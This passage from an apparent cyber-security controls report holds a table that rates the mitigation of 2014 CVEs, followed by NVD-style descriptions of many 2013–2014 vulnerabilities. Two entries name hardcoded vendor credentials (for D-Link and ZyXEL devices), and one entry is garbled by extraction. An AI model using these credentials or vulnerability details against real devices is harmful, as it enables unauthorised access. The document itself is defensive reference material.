CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | (blank in source) | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n n (two values in source) | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 20 of 28

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

